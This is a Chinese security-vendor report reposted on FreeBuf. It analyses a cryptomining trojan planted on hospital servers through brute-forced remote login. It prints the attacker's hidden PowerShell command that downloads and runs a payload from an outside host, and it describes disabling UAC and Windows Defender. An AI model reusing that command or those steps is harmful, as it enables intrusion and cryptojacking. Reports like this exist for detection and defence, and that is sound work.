freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

广东重庆多家三甲医院服务器遭暴力入侵,黑客赶走50余款挖矿木马独享挖矿资源
2018-07-24 16:03:24
所属地 广东省

0x1 背景

腾讯御见威胁情报中心近期检测到广东、重庆多家三甲医院服务器被黑客入侵,攻击者暴力破解医院服务器的远程登录服务,之后利用有道笔记的分享文件功能下载多种挖矿木马。

攻击者将挖矿木马伪装成远程协助工具Teamviewer运行,攻击者的挖矿木马会检测多达50个常用挖矿程序的进程,将这些程序结束进程后独占服务器资源挖矿。该挖矿木马还会通过修改注册表,破坏操作系统安全功能:禁用UAC(用户帐户控制)、禁用Windows Defender,关闭运行危险程序时的打开警告等等。

已知样本分析发现,攻击者使用的挖矿木马拥有多个矿池,开挖的山寨加密币包括:门罗币(XMR)、以太坊(ETH)、零币(ZEC)等等,从矿池信息看,目前攻击者已累积获利达40余万元人民币。

腾讯御见威胁情报中心已发现有关病毒作者的线索,这位挖矿木马的控制者使用同一个ID在各类黑客论坛、开发者论坛活跃时间长达十年以上。

据腾讯御见威胁情报中心统计分析,我国医疗机构开放远程登录服务(端口号:22)的比例高达50%,这意味着有一半的服务器可能遭遇相同的攻击。

0x2 详细分析

0x2.1 传播方式

1.png

木马攻击流程

22端口提供ssh隧道连接服务;23端口主要用于Telnet(远程登录)服务,是Internet上普遍采用的登录和仿真程序,由于一些管理员的安全意识薄弱,设置密码简单容易猜解,导致黑客能够通过密码字典进行猜解爆破登录。

入侵成功后利用powershell下载挖矿木马母体s.exe,命令行:

powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://t.cn/RdBAka2','C:\Users\Public\s.exe');[System.Diagnostics.Process]::Start('C:\Users\Public\s.exe')

hxxp://t.cn/RdBAka2是短链接,对应实际的地址为:

hxxp://note.youdao.com/yws/public/resource/42f8bf644b487698527e48abaeb5b1f1/xmlnote/1B81E7513E0341ADAEC4F7184D56E22B/208 

然后利用网易有道云笔记的文件分享功能来进一步下载木马,可以看到该地址上存放了大量的木马。

2.png

0x2.2 母体s.exe

访问有道云笔记接口

hxxp://note.youdao.com/yws/public/note/c8c088c27a169f54ecc00864bff300fc?keyfrom=public

获取木马下载地址

hxxp://note.youdao.com/yws/public/resource/e5b312333e8618e25badf7863ac8de0f/xmlnote/B811A461208843FAB6762B99FEA4965A/172

3.png

下载挖矿木马svchost.exe

4.png

启动挖矿木马

5.png

0x2.3 挖矿木马

0x2.3.1 自保护

关闭UAC提示

6.png

修改管理员批准提示

7.png

去掉bat、exe、reg、vbs、chm等文件的打开时警告

8.png

禁用Windows Defender 

9.png

0x2.3.2 挖矿

木马采用开源挖矿程序xmrig编译,版本为2.6.0

10.png

从地址hxxp://s.logv586.cc/更新木马

11.png

更新的挖矿木马伪装成Teamviewer.exe程序的图标以及文件名

12.png

并且将木马藏身在music等文档目录下

13.png

木马在挖矿前结束其他挖矿进程,争夺中招机器上的的计算资源。结束挖矿进程列表如下。

EthDcrMiner64.exe、eth.exe、eth11.exe、NMiner.exe、ETHSC.exe、miner.exe、ethdcr.exe、ccminer.exe、NiceHashMinerLegacy.exe、ZecMiner64.exe、DaggerGpuMiner.exe、xmrig.exe、VaalEth64.exe、zm.exe、ethminer.exe、ccminer-x64-75.exe、bfgminer.exe、ccminer-x64.exe、ethminer117.exe、cast_xmr-vega.exe、miner64.exe、enemy.exe、etherdisk-miner.exe、xmr-stak-amd.exe、NsGpuCNMiner.exe、xmrig-amd.exe、lolMiner-mnx.exe、ChinaMiner.exe、挖矿专家.exe、marsminer.exe、bminer.exe、excavator.exe、PhoenixMiner.exe、ethsafe.dat、MinerMaster.exe、ccminerAlexis78.exe、minerd.exe、长沙-矿工ETH-SC双挖.exe、长沙-矿工A卡V5.6.exe、长沙-矿工N卡ZECV1.032.1.6(N卡0.3.2b内核).exe、eth&etc挖矿.exe、中国掘金者.exe、NiceHashMiner.exe、Miner.exe、client.exe、AwesomeMiner.RemoteAgent.exe、11.6.exe、10.2eth&etc挖矿.exe、EthControl.exe、MaxBai挖矿伴侣(整合版).exe、富矿矿工.exe、Optiminer.exe

14.png

检测Taskmgr.exe,若存在该进程则停止挖矿。

15.png

0x2.3.3 收益

挖矿进程伪装成系统进程svchost的相似名svchsot

16.png

矿池:xmr.f2pool.com

钱包1:4LYWaNAqVLsD2BoEqi64szTFV64R8xz7QPhxgHFeDrrPU5nii5uWGXh128UUYXayQHFUrjojugSByAyf2VHatc9gL72XXnP8gjwSQrhZMn

17.png

矿池:xmr.f2pool.com

钱包2:4LYWaNAqVLsD2BoEqi64szTFV64R8xz7QPhxgHFeDrrPU5nii5uWGXh128UUYXayQHFUrjojugSByAyf2VHatc9gLDtn6LAmyhbCFFfuWB

18.png19.png

矿池:eth.f2pool.com

钱包3:0xd20685b3f6B641898cdfe7b02CBfa8Bd9D8Ec214

20.png21.png

矿池:zec.f2pool.com

钱包4:t1Rj1ZmR1x1tFm48fcQ9SLPgkiNBMJzZvFZ

22.png23.jpg

综合各个钱包信息累计挖矿已获得收益40余万元人民币。

24.png

0x3 黑客画像

0x3.1 钱包

在其中一个挖矿木马中发现一个donate钱包,该钱包在此木马挖矿运行时没有被使用。42jgiScVMgMGkYSCfCFngpZHmuuBBzQ58fSGTiY3zPe4KnsMMHbj6oXKoVFHqbrPYNa2mqq9uZsuecYcmeC8TP4m9YRY9sr

25.png

搜索这个钱包,发现在网上唯一记录是在百度贴吧中。有贴吧用户投诉某挖矿软件提供者LuckerBD(贴吧号)提供了带有后门的挖矿软件,而该“后门钱包”正是木马代码中包含的donate钱包。

26.png

找到LuckerBD提供的挖矿程序下载地址下载得到门罗币挖矿程序

27.png

其挖矿配置文件congfig.json中包含该“后门钱包”,但在教程中有说明该钱包需要替换成自己的。

28.png

目前不能证明该贴吧用户LuckerBD(QQ:256*****)与此次挖矿攻击的直接关系,但不排除其提供相关程序以及参与制作的可能。

0x3.2 论坛信息

在代码中发现了有关某论坛dult.cn的代码以及url记录

29.png

还包括论坛相关人员QQ:2580*****、1224******

30-1.png

目前不能证明论坛以及QQ对应人员参与了此次挖矿攻击,但不排除提供了相关程序或技术支持的可能。

0x3.3 邮箱

在木马使用的另一个矿池帐号中发现了邮箱地址lb63*****@hotmail.com。该帐号在minergate网站注册后进行挖矿,而在该网站注册时需使用真实有效的邮箱地址,所以邮箱lb63*****@hotmail.com有可能是木马作者的。

31.png

搜索发现该邮箱帐号对应的名称lb63*****在各类黑客、开发者论坛有大量记录,时间跨度从2008年到2018年。

30-2.png

lb63*****在漏洞银行的记录。

33.png

在cctry.com(VC驿站)发现lb63*****是河南用户

34.png

在bbs.125.la(精益论坛)发现lb63*****使用的QQ号1002*****

35-1.png

QQ1002*****信息地址也显示为河南。

36.png

0x4 关联分析

跟踪分析发现被入侵的设备IP网段比较集中,特别是113.*网段存在大量被入侵的机器, 例如被攻击的广州市某人民医院、广州市某大学附属医院、重庆某儿童医院、天津某大学等等,这些机构的设备都处于113.*网段,而这些机器上又都开放有22、23等端口。

因此推测黑客入侵通过批量扫描发现网络上存在易受攻击的机器,然后进行端口爆破入侵并植入了挖矿木马。目前发现该挖矿木马主要感染地区前三依次为江苏、上海、广东。

37.png

0x5 安全建议

1.加固服务器,修补服务器安全漏洞。使用安全的密码策略,使用高强度密码,切勿使用弱口令,防止黑客暴力破解。

2.如果不常使用可关闭22、23等易受攻击的端口。

3.使用腾讯御知网络空间风险雷达(网址:https://s.tencent.com/product/yuzhi/index.html)进行风险扫描和站点监控。

4.网站管理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该系统具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统安全。

5.检查进程中是否存在Teamviewer.exe,如果网管并未使用该远程管理工具,而进程中存在,表示已经中招,企业用户推荐使用腾讯御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)查杀。

0x6 IOCs

域名

s.logv586.cc

s.sock5.co

g.sock5.co

URL

hxxp://s.logv586.cc/1.txt

hxxp://s.logv586.cc/2.txt

hxxp://s.logv586.cc/update1.exe

hxxp://s.sock5.co:8089/eth/0508/kill.txt

hxxp://s.sock5.co:8087/eth/yx3/lin.asp?&a=csxf&ser=

hxxp://s.sock5.co:8089/eth/0508/name.txt

hxxp://s.sock5.co:8087/menluo/1.png

hxxp://s.sock5.co:8087/menluo/2.png

hxxp://note.youdao.com/yws/public/note/c8c088c27a169f54ecc00864bff300fc?keyfrom=public

hxxp://note.youdao.com/yws/public/note/6038b28fea954435260f1f49b8700fbd?keyfrom=public

hxxp://note.youdao.com/yws/public/resource/42f8bf644b487698527e48abaeb5b1f1/xmlnote/1B81E7513E0341ADAEC4F7184D56E22B/208

hxxp://note.youdao.com/yws/public/resource/42f8bf644b487698527e48abaeb5b1f1/xmlnote/123C970B749E41DABC4F49669EFCDDF4/105

hxxp://note.youdao.com/yws/public/resource/a365f4dc4f18be9fd6cfe8d3e657ac19/xmlnote/F1CCE56966A8481D98C87104B36D216A/165

hxxp://note.youdao.com/yws/public/resource/353fa4934376046777e3ba97ae1d530e/xmlnote/080B33DC6C124250A343E0ED57E96427/163

hxxp://note.youdao.com/yws/public/resource/c7003500e91d08b776585d7b57758607/xmlnote/17BA9DA052DC4CE48DEC28ED756775F9/168

hxxp://note.youdao.com/yws/public/resource/7ac6d30ee18a2f55405faa438035695a/xmlnote/A28B488699F448C9A9C9EB7343FA89AE/152

hxxp://note.youdao.com/yws/public/resource/4783e051988fb0eff8cf383200c536f1/xmlnote/A28B12E6FEE94255B0DA557BE74EE00D/155

hxxp://note.youdao.com/yws/public/resource/33dfd1aa0be86a4fe84be3843f47f1b5/xmlnote/4403BF98162E42748698AE379B5391FF/158

hxxp://note.youdao.com/yws/public/resource/e5b312333e8618e25badf7863ac8de0f/xmlnote/B811A461208843FAB6762B99FEA4965A/172

hxxp://note.youdao.com/yws/public/resource/c438575278e9960ccc2b1641b430be8e/xmlnote/1099078ED4224078ADACA3FBDF0DA2A9/176

矿池-钱包

xmr.f2pool.com

4LYWaNAqVLsD2BoEqi64szTFV64R8xz7QPhxgHFeDrrPU5nii5uWGXh128UUYXayQHFUrjojugSByAyf2VHatc9gL72XXnP8gjwSQrhZMn

xmr.f2pool.com

4LYWaNAqVLsD2BoEqi64szTFV64R8xz7QPhxgHFeDrrPU5nii5uWGXh128UUYXayQHFUrjojugSByAyf2VHatc9gLDtn6LAmyhbCFFfuWB

zec.f2pool.com t1Rj1ZmR1x1tFm48fcQ9SLPgkiNBMJzZvFZ

eth.f2pool.com 0xd20685b3f6B641898cdfe7b02CBfa8Bd9D8Ec214

Md5

f4bae88610da798f9e3669a9db002643

aea15475e5554ce412ae96e4a89565de

d255f8e52020606ce118d43503762ab4

413658168e476eb02373907954181f58

b1f1eef4f2e4a50428f426efb7c767ef

35154485d43d421be7b81d2100fb9e4a

cc2430273474cba1f6bdbff5f0319826

fe6c9b84934295ffa3903bbdf13de7d5

f806b54c1306c054a623188bc7523ad4

6cb9aa4e5cc730805deb4fd1a0038398

c09d0d4d2d0386c90f0dd1f994b246c5

f4b3e335011de366a01ce711b29c147d

6149e53a77f4b0af0bcd015c862f3748

a87a7d4cb1d709d8ac0fe7fb26603c96

11b16372746c70b8a16ea7527789483a

e036dbd652426927b31cd1c11692f9fb

354878bfaed1ff3ed393359653673a16

9281aafc34c6488d032cdce379a55cd7

*本文作者:腾讯御见威胁情报中心,转载请注明来自FreeBuf.COM

# 黑客 # 挖矿 # 医院
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者